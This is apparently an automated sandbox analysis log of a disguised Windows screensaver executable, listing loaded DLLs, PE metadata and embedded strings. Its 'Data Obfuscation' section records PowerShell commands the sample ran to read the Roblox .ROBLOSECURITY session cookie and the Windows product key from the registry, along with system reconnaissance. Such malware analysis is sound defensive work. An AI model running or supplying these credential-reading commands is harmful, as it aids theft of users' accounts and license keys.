Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\tasklist.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: #U202f#U202f#U2005#U00a0.scr.exe Static file information: File size 8505922 > 1048576
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038238108.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038502657.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.pdb source: powershell.exe, 00000029.00000002.2158201728.0000015301604000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035542606.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340338024.00007FF8B7EB3000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036561449.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034682833.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037539805.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038015630.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038599367.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343520683.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035844726.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037713341.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037350742.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037933852.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342094311.00007FF8B9071000.00000040.00000001.01000000.00000007.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034770359.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340877451.00007FF8B8CB1000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036870702.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034476266.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035401905.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037858907.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341409452.00007FF8B8F8C000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343290926.00007FF8B9F61000.00000040.00000001.01000000.0000000A.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.pdbhPu source: powershell.exe, 00000029.00000002.2158201728.0000015301604000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037034859.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbUGP source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340338024.00007FF8B7EB3000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342474030.00007FF8B93C1000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038812496.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8C63000.00000040.00000001.01000000.00000005.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035749504.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2333738469.00007FF8A819F000.00000040.00000001.01000000.00000014.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037437086.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036777921.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034582747.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037785909.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343520683.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036215404.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038322803.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036953380.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000044.00000000.2208106332.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmp, rar.exe, 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036690975.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343092804.00007FF8B9841000.00000040.00000001.01000000.0000000E.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038915705.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037125137.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037632410.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037218357.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035650264.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339702487.00007FF8A9355000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341409452.00007FF8B8F8C000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038406109.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036066040.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341828225.00007FF8B9061000.00000040.00000001.01000000.00000013.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035945476.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341133552.00007FF8B8CD1000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339702487.00007FF8A9355000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038117369.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038707513.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340532745.00007FF8B8B11000.00000040.00000001.01000000.0000000F.sdmp
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: api-ms-win-core-console-l1-1-0.dll.0.dr Static PE information: 0xA9D30DED [Wed Apr 14 15:12:45 2060 UTC]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A86A7B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 2_2_00007FF8A86A7B30
Source: _sqlite3.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x11538
Source: unicodedata.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x4f1a1
Source: _ssl.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x1972f
Source: libcrypto-3.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x192b2f
Source: _decimal.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x1c088
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: real checksum: 0x8219e0 should be: 0x827320
Source: _lzma.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x1ac45
Source: _bz2.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x188ee
Source: libffi-8.dll.0.dr Static PE information: real checksum: 0x0 should be: 0xa1d1
Source: python312.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x1c135b
Source: _queue.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x8181
Source: _socket.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x14b65
Source: _hashlib.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0xb5c7
Source: libssl-3.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x396d1
Source: select.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x6d48
Source: _ctypes.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x1e3bf
Source: sqlite3.dll.0.dr Static PE information: real checksum: 0x0 should be: 0xaa20d
Source: xuxqeuoy.dll.43.dr Static PE information: real checksum: 0x0 should be: 0x85b8
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.0.dr Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr Static PE information: section name: _RDATA
Source: libffi-8.dll.0.dr Static PE information: section name: UPX2
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE55004 push rsp; retf 0_2_00007FF73AE55005
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095F01 push r12; ret 2_2_00007FF8A8095F10
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095D06 push r12; ret 2_2_00007FF8A8095D08
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8097FFF push r12; ret 2_2_00007FF8A809804A
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095C31 push r10; ret 2_2_00007FF8A8095C33
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8099327 push rsp; ret 2_2_00007FF8A8099328
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095E18 push rsp; ret 2_2_00007FF8A8095E1C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8098419 push r10; retf 2_2_00007FF8A8098485
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095F56 push r12; ret 2_2_00007FF8A8095F73
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8098F42 push rsp; iretq 2_2_00007FF8A8098F43
